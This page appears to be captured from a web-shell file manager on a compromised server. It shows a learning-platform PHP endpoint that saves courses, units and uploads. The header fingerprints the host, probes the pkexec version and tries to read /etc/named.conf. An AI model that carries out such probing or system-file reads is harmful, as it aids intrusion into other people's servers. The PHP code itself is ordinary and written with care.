Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
/
home /
lifelonglearn /
work_181165 /
API /
ViewsCouse /
NAME
SIZE
PERMISSION
ACTION
Controller.php
8.92
KB
-rwxr-xr-x
SaveCouseManage.php
2.58
KB
-rwxr-xr-x
StudyCouse.php
5.21
KB
-rwxr-xr-x
couseFetch.php
3.6
KB
-rwxr-xr-x
couseSelect.php
3.52
KB
-rwxr-xr-x
saveControl.php
8.23
KB
-rwxr-xr-x
Code Editor : saveControl.php
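<?php
/**
 * saveControl.php - creates a course ("couse") row for the session user, stores
 * the optional uploads, and inserts the submitted units and forms.
 *
 * Request (POST): Unitdata (JSON), Unitdetail, Unitname, status, AuthToken,
 * optional uploads "file" and "file-detail", or a "file-detail" POST value.
 * Response: no body on success ("out" is echoed when the "file" upload is
 * rejected); on failure HTTP 405 with {"status": false, "message": ...}.
 *
 * NOTE(review): every failure path answers 405, including a bad token and
 * database errors; kept as-is because clients may depend on it.
 */
try {
    require_once("../../server/server.php");

    // Emit the JSON error envelope shared by all failure paths and stop.
    $fail = function ($message) {
        http_response_code(405);
        echo json_encode(array("status" => false, "message" => $message));
        exit;
    };

    // Request values are stored as text; missing or non-scalar input becomes ""
    // so a bound parameter never receives an array.
    $text = function ($value) {
        return is_scalar($value) ? (string) $value : "";
    };

    // Truthy input maps to 200, falsy to 405 (same outcome as `== false`).
    // NOTE(review): the string "false" is truthy in PHP; confirm what the client sends.
    $flag = function ($value) {
        return $value ? 200 : 405;
    };

    // All SQL goes through prepare/execute with bound values: every value here
    // originates from $_POST, $_FILES or decoded JSON and must never be
    // concatenated into the statement text.
    $run = function ($sql, array $params = array()) use ($db) {
        $statement = $db->prepare($sql);
        if ($statement === false || !$statement->execute($params)) {
            throw new RuntimeException("Query failed");
        }
        return $statement;
    };

    if ($_SERVER["REQUEST_METHOD"] != "POST") {
        $fail("Request method Not accept!!");
    }

    // Invalid or missing JSON is treated as "no units" instead of failing later in count().
    $Unitdata = json_decode($text($_POST["Unitdata"] ?? ""), true);
    if (!is_array($Unitdata)) {
        $Unitdata = array();
    }

    $Unitdetail = $text($_POST["Unitdetail"] ?? "");
    $Unitname = $text($_POST["Unitname"] ?? "");
    $status = $flag($_POST["status"] ?? null);
    $AuthToken = $_POST["AuthToken"] ?? null;
    $id = $_SESSION["lms-ID"] ?? null;
    // The original format string ended in "H:i:" and dropped the seconds.
    $date = date("Y-m-d H:i:s");

    // A request without a session user or without a string token is rejected
    // through the same path as a wrong token.
    $data = false;
    if (is_scalar($id)) {
        $data = $run("SELECT ID, AuthToken FROM user WHERE ID = ?", array($id))->fetch(PDO::FETCH_ASSOC);
    }
    $storedHash = is_array($data) && isset($data["AuthToken"]) ? $data["AuthToken"] : null;
    if (!is_string($AuthToken) || !is_string($storedHash) || !password_verify($AuthToken, $storedHash)) {
        $fail(" AuthToken Invalid!!");
    }

    $run(
        "INSERT INTO couse (userID,Unitname,detail,filetitle,detailType,value,date,rate,see,comment,status)"
        . " VALUES (?,?,?,'','','',?,'0','0','0',?)",
        array($id, $Unitname, $Unitdetail, $date, $status)
    );
    $couseID = $db->lastInsertId();

    $allow = array("png", "jpg", "webp", "jpeg");
    $maxUploadBytes = 15 * 1048576; // 15 MB

    // Validate one upload and move it under file/users/couse/. Returns the stored
    // relative path, or null when the upload is rejected or cannot be moved.
    // The stored name is random (random_bytes, PHP 7+) and carries only an
    // allow-listed extension, so the client-supplied file name never reaches disk.
    // NOTE(review): the content is not inspected; only the extension is checked.
    $storeUpload = function ($file) use ($allow, $maxUploadBytes) {
        if (!is_array($file) || !isset($file["error"]) || $file["error"] !== UPLOAD_ERR_OK) {
            return null;
        }
        $ext = strtolower(pathinfo($text = (string) $file["name"], PATHINFO_EXTENSION));
        if ($file["size"] >= $maxUploadBytes || !in_array($ext, $allow, true)) {
            return null;
        }
        $storedName = bin2hex(random_bytes(16)) . "." . $ext;
        if (!move_uploaded_file($file["tmp_name"], "../../file/users/couse/" . $storedName)) {
            return null;
        }
        return "file/users/couse/" . $storedName;
    };

    if (isset($_FILES["file"])) {
        $coverPath = $storeUpload($_FILES["file"]);
        if ($coverPath !== null) {
            $run("UPDATE couse SET filetitle = ? WHERE ID = ?", array($coverPath, $couseID));
        } else {
            echo "out";
        }
    }

    if (isset($_FILES["file-detail"])) {
        $detailPath = $storeUpload($_FILES["file-detail"]);
        if ($detailPath !== null) {
            $run("UPDATE couse SET value = ?, detailType = 'file' WHERE ID = ?", array($detailPath, $couseID));
        }
    } elseif (isset($_POST["file-detail"])) {
        // NOTE(review): stored exactly as submitted; whatever renders this value
        // has to escape or validate it for its own output context.
        $run(
            "UPDATE couse SET value = ?, detailType = 'video' WHERE ID = ?",
            array($text($_POST["file-detail"]), $couseID)
        );
    }

    // unit add
    foreach ($Unitdata as $group) {
        if (!is_array($group) || !isset($group["dataUnit"]) || !is_array($group["dataUnit"])) {
            continue;
        }

        foreach ($group["dataUnit"] as $data) {
            if (!is_array($data)) {
                continue;
            }

            // Next position = highest existing role + 1, or 0 for an empty table.
            // The original read $stmp["order"], a column the query never selects.
            // NOTE(review): the maximum is taken over all courses, not just this one.
            $top = $run("SELECT role FROM unit ORDER BY role DESC LIMIT 1")->fetch(PDO::FETCH_ASSOC);
            $role = ($top === false) ? 0 : ((int) $top["role"]) + 1;
            $name = $text($data["Unitname"] ?? "");

            if (($data["type"] ?? null) === "unit") {
                $run(
                    "INSERT INTO dataunit (name,video,see,skip,study) VALUES (?,?,?,?,?)",
                    array(
                        $name,
                        $text($data["video"] ?? ""),
                        $flag($data["see"] ?? null),
                        $flag($data["skip"] ?? null),
                        $flag($data["end"] ?? null),
                    )
                );
                $unitID = $db->lastInsertId();
                $run(
                    "INSERT INTO unit (couseID,type,role,unitID) VALUES (?,'unit',?,?)",
                    array($couseID, $role, $unitID)
                );
            } else {
                $run(
                    "INSERT INTO form (name,study,done,testID) VALUES (?,?,?,'0')",
                    array($name, $flag($data["study"] ?? null), $flag($data["done"] ?? null))
                );
                $formID = $db->lastInsertId();
                $run(
                    "INSERT INTO unit (couseID,type,role,unitID) VALUES (?,'test',?,?)",
                    array($couseID, $role, $formID)
                );
            }
        }
    }
} catch (Exception $e) {
    // Keep the detail in the server log: database error messages can reveal
    // SQL text and schema, so the client only receives the generic message.
    error_log("saveControl.php: " . $e->getMessage());
    http_response_code(405);
    echo json_encode(array("status" => false, "message" => " server Error!!"));
    exit;
}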